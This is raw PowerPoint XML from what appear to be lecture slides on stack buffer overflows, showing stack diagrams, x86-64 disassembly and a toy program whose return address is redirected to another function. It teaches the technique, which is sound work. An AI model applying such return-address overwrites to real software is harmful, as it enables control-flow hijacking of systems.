        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="99" name="Straight Arrow Connector 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E5F164C-AB49-2C4C-B392-267B7E5B7256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="1"/>
            <a:endCxn id="77" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10746959" y="4294648"/>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A4B36BA-A142-664C-9259-EABC192E02E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11018537" y="3311766"/>
            <a:ext cx="756938" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="101" name="Straight Arrow Connector 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B175EFAE-E165-BB4D-A06C-49A7377E1143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="100" idx="1"/>
            <a:endCxn id="57" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10746959" y="3496432"/>
            <a:ext cx="27157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57B14C67-01AA-D246-B650-7812CFA13BD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10749167" y="1552188"/>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8" name="Oval 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87BDD0D-283A-E447-9736-D9DB8604CE68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752601" y="5609772"/>
            <a:ext cx="2159000" cy="2935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380282D-BA0E-0148-944F-56AC66CCE5B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964837" y="6030332"/>
            <a:ext cx="2010102" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>new return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Rounded Rectangle 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC4375E6-8CE7-4144-994B-6DFE72FE824D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974939" y="5053898"/>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59" name="Elbow Connector 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693F702A-C201-1E47-9310-4544167434B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="58" idx="4"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4527106" y="3735722"/>
            <a:ext cx="472601" cy="3862613"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48371"/>
              <a:gd name="adj2" fmla="val 63974"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CD6965-8BD6-3942-876E-52C637A1946D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8565190" y="5247167"/>
            <a:ext cx="1787123" cy="3135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rgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF2E656-6059-F24B-B8CC-2C0ED027C7BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6694714" y="5300714"/>
            <a:ext cx="3657600" cy="260027"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   $0x8,%esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279909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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58"/>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randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>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left)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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p:bldP spid="62" grpId="0" animBg="1"/>
      <p:bldP spid="1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8862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Righ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strips(downRigh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strips(downRight)">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A27D5F-D769-CE42-B8D0-5AC6A188D823}"/>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D13001E1-337E-3B44-BA5F-1B80CFEF193A}"/>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7" name="Title 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC4B996-243F-CF44-98F7-5449E485F111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA3452A-2F20-544D-8260-FC32B81AFB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834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Let’s “Return” to a Different Function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90343901-DCAB-1044-B9AF-71839BFABDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1503278"/>
            <a:ext cx="9391651" cy="482867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caller()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.\n");</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FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>not_caller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("Did not return to caller! (insert maniacal laugh here)\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    exit(0);</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342655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Let’s “Return” to a Different Function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94ABD81F-9525-7345-BBEB-EE93A79CA306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7345825" y="1237664"/>
            <a:ext cx="4830980" cy="3182353"/>
            <a:chOff x="6512878" y="1197691"/>
            <a:chExt cx="4830980" cy="3182353"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4EF7E3D-C403-B344-9459-A539C300A6AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="2787821"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D29E65C4-212B-EB43-85CF-09CCF810C602}"/>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0" name="Rectangle 39">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E855E04F-AE9C-9F45-B703-BCD94F216FAD}"/>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1" name="Rectangle 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25855C6-9AB2-2941-90AB-0B095F8655CB}"/>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2" name="Rectangle 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D088F16-6B1C-8F4C-BBA5-3A38FD65E8C2}"/>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3" name="Rectangle 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A71C8D-5FBB-6D46-A6D0-4FE13D4BC580}"/>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4" name="Rectangle 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EE451A9-2DDF-F446-910C-D25326414676}"/>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5" name="Rectangle 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047C66DA-2A5D-AD4D-AAB6-82857D6DAE9F}"/>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46" name="Rectangle 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6371FBC2-7315-9F4E-9789-E0269AFBE07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1" name="Group 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45957D08-54C6-C448-BEF2-D9B174469CF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="3586038"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7465EA4D-75F1-2149-84A4-2B1FCC0DFC50}"/>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2" name="Rectangle 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D150C261-6B51-1648-A98B-188168F54535}"/>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3" name="Rectangle 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51044446-1BDF-4A49-A4DE-B7EB2E8353BA}"/>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4" name="Rectangle 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A346EC-6170-8745-85E2-E2462E2941F9}"/>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5" name="Rectangle 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B3D28E-3EF6-A04D-A204-ECF0E616DA5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6" name="Rectangle 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403BFC4A-66C6-7F48-86C6-7D9E64636E48}"/>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7" name="Rectangle 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2B16FC-A51F-3944-9ABA-25DBC987DA6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8" name="Rectangle 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AB27427-512D-FA43-883E-77FFE2FAAA2C}"/>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3" name="Group 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{512FFDB0-58EE-DD4F-86A3-4CD33CA374D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1993802"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="Rectangle 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACE08695-51CD-6643-8C68-9B0819631FD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 name="Rectangle 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{799D3734-7EFD-964D-8CC3-C53EEEFCA786}"/>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5" name="Rectangle 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F439E652-2793-2F45-AE03-38B4FEF7AD04}"/>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6" name="Rectangle 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A71B1FA9-1F08-0944-A94D-B6774665DED9}"/>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7" name="Rectangle 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{228EA9BA-ABCD-C44B-8AC9-61F17D39B51C}"/>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8" name="Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06FD4DB-E888-CA4E-A0C3-CD248E09B1B5}"/>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9" name="Rectangle 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C91DF1-778A-FC4B-8522-0110D46D496D}"/>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0" name="Rectangle 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E0C1949-01DB-174F-8385-F7B051AE73CF}"/>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 name="Group 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD1879DC-3E26-224B-AA12-83B4F7F56F34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1197691"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Rectangle 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C543844-E7FF-E94F-B1E0-38CE3BC6F118}"/>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 name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{401F0810-BA53-DD44-A344-494D32CF75E3}"/>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 name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D78ABC4-A009-5A45-9F92-0CE31B51DD40}"/>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8" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B169265D-CFF6-5B43-B5AA-F6E63B8775D2}"/>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9" name="Rectangle 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E194E1CA-19F8-194F-AEF5-233FAEF6F9F6}"/>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20" name="Rectangle 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{584B9700-3D71-1845-8827-293503B9DC66}"/>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1" name="Rectangle 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458999EE-D500-644D-BB0E-BE5E8CC4F0C5}"/>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22" name="Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7674A509-82C9-DA42-A5E4-45BC0A5D6CCF}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B0881B-4B2A-0B4C-8C51-B8B567E4437B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10373010" y="579133"/>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8" name="Rounded Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1832ADEC-9076-9A4F-A428-929BCDA73010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19237" y="1237664"/>
            <a:ext cx="9566798" cy="56203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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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000000000040063a &lt;caller&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063a: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08             sub    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063e:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400643:       e8 b7 ff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400648:       bf 30 07 40 00          mov    $0x400730,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40064d:       e8 7e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400652:       48 83 c4 08             add    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400656: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3" name="Oval 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D499533A-C996-944F-A024-D250C85CDB51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10137913" y="1007165"/>
            <a:ext cx="2239617" cy="13119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Elbow Connector 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66798E73-A718-C843-BEBE-FF015D6E008D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7574866" y="2596012"/>
            <a:ext cx="3959739" cy="3405974"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10003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783AD78A-3670-4F49-8F93-ABFC69D1C95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19238" y="1237665"/>
            <a:ext cx="9566798" cy="562033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00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000004005e7 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>not_caller</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4005e7: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08          	sub    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4005eb:	bf 08 07 40 00       	mov    $0x400708,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4005f0:	e8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>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4005f5:	bf 00 00 00 00       	mov    $0x0,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
